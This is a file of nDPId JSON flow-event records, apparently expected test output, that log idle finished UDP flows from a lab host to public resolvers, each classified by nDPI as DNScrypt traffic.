+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318201,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312405,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":40099,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317434,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":48065,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 